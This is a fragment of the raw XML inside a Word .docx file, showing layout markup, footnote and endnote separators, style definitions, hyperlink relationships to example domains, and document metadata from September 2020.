          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="537FCCD7" wp14:editId="68E22B65">
            <wp:extent cx="5270500" cy="273050"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="21" name="图片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7960" w:rsidRPr="008779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D4B0E6" w14:textId="77777777" w:rsidR="00292DFD" w:rsidRDefault="00292DFD" w:rsidP="00C03B69">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1D913941" w14:textId="77777777" w:rsidR="00292DFD" w:rsidRDefault="00292DFD" w:rsidP="00C03B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52CB7D" w14:textId="77777777" w:rsidR="00292DFD" w:rsidRDefault="00292DFD" w:rsidP="00C03B69">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5B708040" w14:textId="77777777" w:rsidR="00292DFD" w:rsidRDefault="00292DFD" w:rsidP="00C03B6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0E0A"/>
    <w:rsid w:val="000262B8"/>
    <w:rsid w:val="00292DFD"/>
    <w:rsid w:val="007E68B4"/>
    <w:rsid w:val="00877960"/>
    <w:rsid w:val="00992426"/>
    <w:rsid w:val="00A942BE"/>
    <w:rsid w:val="00B10E0A"/>
    <w:rsid w:val="00C03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42593B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D4FA399A-6D28-4B58-AE16-5F61A491AD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3B6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03B6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03B6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03B69"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00992426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9924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552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www.example.com&#30340;ip" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.example.com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://www.example.net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www.bank32.com" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17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6</Pages>
  <Words>170</Words>
  <Characters>974</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>8</Lines>
  <Paragraphs>2</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/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 jingbang</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>fu jingbang</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-20T01:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-20T01:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>